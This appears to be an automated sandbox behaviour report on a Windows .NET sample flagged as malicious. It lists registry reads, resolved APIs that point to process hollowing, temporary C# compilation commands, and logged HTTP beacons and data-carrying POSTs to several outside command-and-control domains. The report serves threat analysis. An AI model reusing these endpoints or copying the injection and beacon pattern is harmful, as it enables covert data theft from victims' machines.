HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F570307C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CompareStringOrdinal
clr.dll.CreateAssemblyNameObject
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
clr.dll.CreateAssemblyEnum
kernel32.dll.ResolveLocaleName
kernel32.dll.LoadLibraryA
kernel32.dll.WideCharToMultiByte
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
advapi32.dll.EventUnregister
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP"

Started Services

Nothing to display

Created Services

Nothing to display

Behavior analysis details

Machine name: Seven03b_64
Machine label: Seven03b_64
Machine manager: VirtualBox
Started: 2018-04-27 09:24:08
Ended: 2018-04-27 09:26:58
Duration: 170

17 HTTP Request(s) detected

http://www.eveloo.com/obr/?mN642=ZECmq3xUvO7xEPzXGBxRLb9gpoYIkABtz/LUE/NPC0ircgPb8/mA1k9p2pLGcHqgClwsTb5S&8p=ChrLW8nPhHRpT
  • Hostname: www.eveloo.com
  • IP Address: 122.10.96.61
  • Port: 80
  • Count: 1

GET /obr/?mN642=ZECmq3xUvO7xEPzXGBxRLb9gpoYIkABtz/LUE/NPC0ircgPb8/mA1k9p2pLGcHqgClwsTb5S&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.eveloo.com
Connection: close


http://www.theskinnyindiantakeaway.com/obr/?mN642=qXga2tXBYVp9fznW1W5s6NvNdjSpyFLJHFwgezWq9EYIXISBzwQVphI+z3qIy1ri6+Fl/Ia8&8p=ChrLW8nPhHRpT
  • Hostname: www.theskinnyindiantakeaway.com
  • IP Address: 74.117.221.22
  • Port: 80
  • Count: 1

GET /obr/?mN642=qXga2tXBYVp9fznW1W5s6NvNdjSpyFLJHFwgezWq9EYIXISBzwQVphI+z3qIy1ri6+Fl/Ia8&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.theskinnyindiantakeaway.com
Connection: close


http://www.theskinnyindiantakeaway.com/obr/
  • Hostname: www.theskinnyindiantakeaway.com
  • IP Address: 74.117.221.22
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.theskinnyindiantakeaway.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.theskinnyindiantakeaway.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.theskinnyindiantakeaway.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.theskinnyindiantakeaway.com/obr/
  • Hostname: www.theskinnyindiantakeaway.com
  • IP Address: 74.117.221.22
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.theskinnyindiantakeaway.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.theskinnyindiantakeaway.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.theskinnyindiantakeaway.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.jmtye.com/obr/?mN642=mXpWvACOgZm3XFbrEzYLDAgqrehK4nHdUDlEvqcvVrNIHmv7DfNuoDBU7OG1FxuvrTbsSYs2&8p=ChrLW8nPhHRpT
  • Hostname: www.jmtye.com
  • IP Address: 192.64.114.9
  • Port: 80
  • Count: 1

GET /obr/?mN642=mXpWvACOgZm3XFbrEzYLDAgqrehK4nHdUDlEvqcvVrNIHmv7DfNuoDBU7OG1FxuvrTbsSYs2&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.jmtye.com
Connection: close


http://www.jmtye.com/obr/
  • Hostname: www.jmtye.com
  • IP Address: 192.64.114.9
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.jmtye.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.jmtye.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.jmtye.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.jmtye.com/obr/
  • Hostname: www.jmtye.com
  • IP Address: 192.64.114.9
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.jmtye.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.jmtye.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.jmtye.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
  • Hostname: www.download.windowsupdate.com
  • IP Address: 67.26.137.254
  • Port: 80
  • Count: 1

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://www.salientchurch.com/obr/?mN642=g43ZCh1FQfYzGmeWU42x29Ngc8XWEbiavyzG19r4icRZx0t+3L2ivfuuL396VRD1GxEIybsN&8p=ChrLW8nPhHRpT
  • Hostname: www.salientchurch.com
  • IP Address: 208.91.197.194
  • Port: 80
  • Count: 1

GET /obr/?mN642=g43ZCh1FQfYzGmeWU42x29Ngc8XWEbiavyzG19r4icRZx0t+3L2ivfuuL396VRD1GxEIybsN&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.salientchurch.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.salientchurch.com/obr/
  • Hostname: www.salientchurch.com
  • IP Address: 208.91.197.194
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.salientchurch.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.salientchurch.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.salientchurch.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.salientchurch.com/obr/
  • Hostname: www.salientchurch.com
  • IP Address: 208.91.197.194
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.salientchurch.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.salientchurch.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.salientchurch.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.phellowes.com/obr/?mN642=ewb1jfFPwBN/eCc3OLkjBef2WFHJRtyO65eOz3oAIYCOgIeaSK0CE71m7DhJy6Qgty176JsL&8p=ChrLW8nPhHRpT
  • Hostname: www.phellowes.com
  • IP Address: 219.94.128.196
  • Port: 80
  • Count: 1

GET /obr/?mN642=ewb1jfFPwBN/eCc3OLkjBef2WFHJRtyO65eOz3oAIYCOgIeaSK0CE71m7DhJy6Qgty176JsL&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.phellowes.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.phellowes.com/obr/
  • Hostname: www.phellowes.com
  • IP Address: 219.94.128.196
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.phellowes.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.phellowes.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.phellowes.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.phellowes.com/obr/
  • Hostname: www.phellowes.com
  • IP Address: 219.94.128.196
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.phellowes.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.phellowes.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.phellowes.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.bireyselqnbfinansbank.com/obr/?mN642=kAZYcjYqCPMtX5QsQnjoOuzokdlon9ygZQfKBzmu41EWN3Ul//+w8e+qrD+grZnFf1Cy5Qko&8p=ChrLW8nPhHRpT
  • Hostname: www.bireyselqnbfinansbank.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /obr/?mN642=kAZYcjYqCPMtX5QsQnjoOuzokdlon9ygZQfKBzmu41EWN3Ul//+w8e+qrD+grZnFf1Cy5Qko&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.bireyselqnbfinansbank.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.bireyselqnbfinansbank.com/obr/
  • Hostname: www.bireyselqnbfinansbank.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.bireyselqnbfinansbank.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.bireyselqnbfinansbank.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.bireyselqnbfinansbank.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.bireyselqnbfinansbank.com/obr/
  • Hostname: www.bireyselqnbfinansbank.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.bireyselqnbfinansbank.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.bireyselqnbfinansbank.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.bireyselqnbfinansbank.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


#infosec #automation

TheSystem Itself @ 2018-04-27 09:27:05

Detected family: #Malicious

TheSystem Itself @ 2018-04-27 09:32:02